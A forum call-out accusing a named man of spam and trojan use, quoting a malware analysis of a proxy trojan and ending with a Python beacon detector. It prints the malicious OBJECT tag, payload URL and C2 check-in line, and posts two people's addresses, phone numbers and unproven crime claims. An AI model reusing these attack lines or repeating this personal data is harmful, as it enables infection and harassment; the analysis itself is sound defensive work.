dominique
I am not quite sure if this thread belongs here. I am sure it can be moved.
This guy is a big time spammer.
Someone at a webmaster board exposed him and he read it.
Next thing he bombs the person who complained with bounced spam - tons
of it. He used their address as the sender and sent out his spam and
they got all the bounces.
Now here is some more info on this person, and it makes your hair
stand on end. I am likely going to be targeted for publishing this,
but I will not have someone like that intimidate everyone.
He is also linked to deploying trojans.
I hope someone will tell him to cut it out. If you speak up against
him he goes after you. I don't think someone like that should be
allowed to intimidate an entire section of the industry!
Jeroen Puttemans
+32.23057068
Platanenlaan 15Perk, BRABANT 1820
BELGIUM
And if in any doubt have a look at this project on Scriptlance for a
mailer with proxy support (we all know what they are used for don't
we?):
That or something like it is what he uses.
He apparently owns this:
Address: Platanenlaan 15, 1820, Perk Belgium Europe
Office: +32 477 99-4283
Fax:
Email: support@casinowebmarketing.com
ICQ: 123226511
Type: Trojan (lures you to a website to be infected by a trojan)
Domain(s)/IP Address(es) used: hotwincasino.com (WHOIS) (DNS)
Exact Link: http://www.hotwincasino.com/page.php
Email's Originating Network(s): Sjrb.ca (Canadian Network)
Danger Level: Medium
Description
Yes, another spammed-out trojan, but this time somewhat different to
the most recent ones, mostly in that it does not appear to be a
keylogger at all. We received an email early this morning with the
subject of:
YOU WON A FREE VACATION
The email also appeared to have no body. It was simply an empty email
that scrolled for a fair way. Being suspicious of this we had a peek at
the source of the email. We were not too terribly surprised to find
that even though the email displayed nothing in the body there was a
line, right down the bottom that read:
object data="xhttp://www.hotwincasino.com/page.php" width="14" height="14"
As we've mentioned many times before, the OBJECT tag is a method of
embedding other content into an HTML page. In this case it fetches and
tries to open:
xhttp://www.hotwincasino.com/page.php
We fetched a copy of this page to investigate further. Again we were
not surprised to find the page was an HTA (HTML Application), which is
basically a very powerful way of allowing web pages to interact with
Windows systems. At present we don't have a full idea of how this one
works. We know that it calls the file:
xhttp://www.hotwincasino.com/mstasks.exe
In order to do something with it but this time the spammers have been
clever and used an encoding function of VBScript to make the code
unreadable to humans. Being non-programmers ourselves we are unsure
how to go about decoding this script. If there are any VBScript people
out there who would like to give the code a look over (remember it is
viral so be careful) there is a copy in the zip file below.
We downloaded the mstasks.exe file from the site (not to be confused
with the Windows file mstask.exe) and ran strings across it in order
to extract any plain text that might give us some clues. This first
pass was not very successful and we only ended up with some information
that confirmed that it appeared to hook into various components of
Windows networking.
In order to find out more, we once again set up our VMware (virtual
machine) with a victim Windows 2000 operating system. Internal
monitoring was set up using the free utilities from Sysinternals who
make some very good tools, highly recommended for forensics work on
Windows machines. External network monitoring was set up on our Linux
gateway.
Once this was set up we loaded up the page the email used and sat back
to watch what happened. Well the good news is that the initial
infection phase doesn't appear to work too well. Our Windows 2000 set
up is totally unpatched but Internet Explorer did actually ask us if
we wanted to save or execute the code being sucked down. This should
tip most people off to something being wrong and cancelling the
transaction. However since we don't have other systems to test,
perhaps other versions of Windows do execute the code without asking.
Either way, once the code is executed a small blank window pops up.
Nothing inside it. However in the background there is some serious
work happening. From what we can tell the contents of mstasks.exe are
downloaded and then executed on the machine. This creates a number of
files. We found that in the C:\ directory there were two new
executable files:
y.exe
x.exe
We also found that in the C:\WINNT\system32\ directory there was a file
called:
scchost.exe
Notice again how the spammers have tried to make the file name similar
to a real Windows file in the same directory (svchost.exe). We found
that this file was now also running as a full time process in the
background. After about 30 seconds another executable was created in
the same directory this time called:
scchostc.exe
This was also started as a full time process (as a child of scchost.exe)
and began to listen on a port. Later on we found that this port
was chosen at random each time the trojan started up. For example
some of the ports we saw being used:
40627
12052
36890
After this point the trojan appeared to simply sit there and await
instructions. After probing the open port for a bit we came to the
conclusion that it was a proxy server. At around this time we also
noticed some network traffic from the machine. First there was a call
from the machine to the site:
http://www.ip2location.com/map.asp
Which is a legitimate web site that simply reports back where your
request is coming from and if you are behind a proxy server. This is
used by the trojan to obtain the machine's real IP address for the next
phase.
The next phase is then to send a request that says:
xhttp://216.52.184.239/command.php?IP=<victim's IP address>&Port=<port number proxy is listening on>
Once this is done the remote server starts sending back a steady
stream of what look like web site fetch requests. However since we're
not super savvy with these we are unable to tell completely.
Basically what we have here is a clever little proxy trojan that the
spammers could easily use for a number of things. Making anonymous web
requests, sending out spam, attacking other machines on the internet
and the fact it reports back to base to keep the spammers up to date
is quite handy for them as they don't have to bother probing to see
which machines are infected.
Having watched the infection in action we then decided to turn our
attention back to the executable files. After some more probing we
found that several of the files had been packed with UPX and that was
why we were getting very little information out of them. We ran the
UPX unpacker across the following files:
mstasks.exe
scchostc.exe
y.exe
The other files we found not to be packed with UPX. Once all the files
were unpacked we ran strings across them and came out with some
interesting results:
mstasks.exe - The initial infection file. Creates scchost.exe and
scchostc.exe. Also adds registry entries to ensure trojan starts at
boot time. Also seems to contain the packed components of the other
files
x.exe - Seems to be a left over from the trojan install. Seems to just
download mstasks.exe and save it to y.exe
y.exe - A duplicate of mstasks.exe
scchost.exe - Trojan start up file. Sets up trojan environment,
initialises scchostc.exe and finds out the victim machine's IP address using
the above stated method.
scchostc.exe - The proxy part of the trojan. Turns out to be a copy of
a legitimate proxy software known as 3Proxy. It appears trojan writers
have used this before as many anti-virus scanners detect it as
Backdoor.Daemonize
It is important to note this is not a worm or a virus. It is not self
propagating. It was purposefully sent out by the spammers, as a bulk
email in order to get people infected with this trojan.
Now we knew what the trojan did, we turned back to where the trojan
came from. We had a look at the top level for the site and found that
it was nothing more than an empty place holder. We also found the
files are being hosted on Yahoo! servers. We will contact Yahoo!
shortly and inform them of this breach of the AUP and hopefully get
the viral files quickly pulled down. We also found that where the
trojan is reporting back to appears to be linked with this domain:
playthehouse.com - (WHOIS) (DNS)
This link is strengthened, for when we check the apparent registrants
for both domains we find the same person:
Jeroen Puttemans
It appears that he is heavily involved with online casinos and,
given what we are seeing today, is not above stooping to using trojaned
machines to do some dirty work for him.
Extra Information
Copy of the email - Due to the fact that Internet Explorer has a habit
of trying to execute HTML code even when a file is marked as plain
text, we will not be placing a copy of the email here until the sites
are confirmed to have been taken down. A copy of the email will be in
the zip file
Strings of mstasks.exe - Before unpacking
Strings of mstasks.exe - After unpacking
Strings of x.exe - No unpacking needed
Strings of y.exe - Before unpacking
Strings of y.exe - After unpacking
Strings of scchost.exe - No unpacking needed
Strings of scchostc.exe - Before unpacking
Strings of scchostc.exe - After unpacking
Screen shot of Internet Explorer prompting to execute or download the
trojan
Screen shot of the window that pops up if the user chooses to execute
it
Screen shot showing scchost.exe running in the background
Screen shot showing the presence of x.exe and y.exe
Screen shot showing scchostc.exe being started as a child of scchost.exe
Screen shot showing scchostc.exe listening on a random port - In this
case port 12052
WARNING
Some of the files contained in the following zip file are viral in
nature. As such we only recommend those who know what they are doing
download the file. Code Fish Spam Watch will not take responsibility
if this warning is ignored and your machine is infected.
Copy of trojan site and other details - Contained within a passworded
zip file. Password "trojan" but without quotes.
Log of further activity
7:15 9/3/04 - Domain still fully active. Going to try and find another
way to contact Yahoo!
And more:
Outdated URL (Invalid)
And he sells credit card info:
Link Removed (Old/Invalid)
And it gets worse....what a lowlife scumbag!
WARNING
If you have been sent to this website by a person calling himself
'godmailer', or using the following contact details, you are being
ripped off. The product functionality that he describes is inaccurate
and not included in our releases.
Jeroen Puttemans (webmaster@turnkeycasino.net)
+32.23057068
Platanenlaan 15
Perk, Brabant 1820
BE
Martin Puttemans (webmaster@turnkeycasino.net)
+32.477994283
Vinkreed 4
Osmod, BRABANT 1820
BE
ICQ: 123226511
He is offering to sell our product for between $300 and $500 USD. We
have determined that he has obtained an early version of our product
(REL-0.6) which is severely outdated and functionally incomplete. We
have complete logs of his intrusion attempts over the past 2 months
and authorities have been contacted.
We have removed all product information and documentation in the
interim.
If you have already purchased a copy of our software from the above
mentioned person please contact us at sales@cleanmailer.com, all
information will be treated in the strictest of confidence.
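A defender-side check for the two behaviours the quoted analysis describes (the command.php?IP=...&Port=... check-in seen at the gateway, and dropped files named to mimic svchost.exe and mstask.exe), written as an added example that is not part of the original post or of Code Fish's analysis. The one-line "client method url" log format, the 203.0.113.7 command server and the 198.51.100.23 victim address are constructed for the example.

```python
from urllib.parse import urlparse, parse_qs
# Constructed gateway log ("client method url"); the check-in URL follows the shape
# the write-up describes (command.php?IP=<victim ip>&Port=<proxy port>).
SAMPLE_LOG = """\
10.0.0.5 GET http://www.ip2location.com/map.asp
10.0.0.5 GET http://203.0.113.7/command.php?IP=198.51.100.23&Port=12052
10.0.0.9 GET http://www.example.com/index.html
10.0.0.5 GET http://203.0.113.7/command.php?IP=198.51.100.23&Port=40627
"""
def find_beacons(log_text):
    # Return (client, reported_ip, port) for every request shaped like the check-in.
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        client, _method, url = parts
        u = urlparse(url)
        if not u.path.endswith("/command.php"):
            continue
        q = parse_qs(u.query)
        ip, port = q.get("IP", [""])[0], q.get("Port", [""])[0]
        if ip and port.isdigit():
            hits.append((client, ip, int(port)))
    return hits
# Legitimate names the dropped files imitate (svchost.exe, mstask.exe).
KNOWN_GOOD = {"svchost.exe", "mstask.exe"}

def edit_distance(a, b):
    # Plain Levenshtein distance: insert, delete and substitute each cost 1.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_names(names, max_distance=2):
    # Flag names close to, but not equal to, a known Windows binary name.
    flagged = []
    for name in names:
        n = name.lower()
        if n in KNOWN_GOOD:
            continue
        best = min(KNOWN_GOOD, key=lambda k: (edit_distance(n, k), k))
        if edit_distance(n, best) <= max_distance:
            flagged.append((name, best))
    return flagged
```

Because the proxy port is random per start, the stable indicator is the URL shape plus the preceding ip2location lookup from the same client, not any one port number.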